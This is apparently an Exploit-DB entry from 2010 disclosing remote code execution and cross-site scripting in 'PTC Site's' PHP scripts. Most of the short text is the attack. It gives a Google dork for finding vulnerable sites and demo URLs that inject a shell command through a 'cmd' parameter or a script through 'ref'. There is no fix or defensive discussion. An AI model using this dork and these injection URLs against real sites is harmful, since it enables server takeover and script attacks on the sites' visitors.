PTC Site's - Remote Code Execution / Cross-Site Scripting

EDB-ID:

12808

CVE:

N/A




Platform:

PHP

Date:

2010-05-30


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P 
@Dork:"intext:Warning: passthru()" "inurl:view=help"

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]

Demo: 

#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$